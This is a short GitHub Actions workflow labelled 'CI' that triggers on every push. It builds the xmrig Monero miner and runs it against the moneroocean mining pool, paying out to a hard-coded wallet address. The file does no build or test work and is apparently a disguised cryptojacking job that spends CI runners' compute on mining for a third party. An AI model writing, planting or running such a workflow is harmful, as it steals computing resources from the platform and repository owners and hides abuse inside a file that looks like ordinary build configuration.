name: CI


on: [push, workflow_dispatch]


jobs:

  build:


    runs-on: ubuntu-latest


    steps:

    - name: Download

      run:  sudo apt install git cmake build-essential libssl-dev libuv1-dev libhwloc-dev

    - name: Clone

      run: git clone https://github.com/xmrig/xmrig.git

    - name: mine

      run: cd xmrig;mkdir build;cd build;cmake ..;make -j4;./xmrig --cpu-no-yield -o gulf.moneroocean.stream -u 46fsx5UU1NBaDBFKJcK5TaZMgwCiy1nptHGkPBFR8U8Me74XPuKXkotgQfzkPkUc8zSKrN1ryEcMDZeGDouQMyqrVTQiTmv -p vm3
      
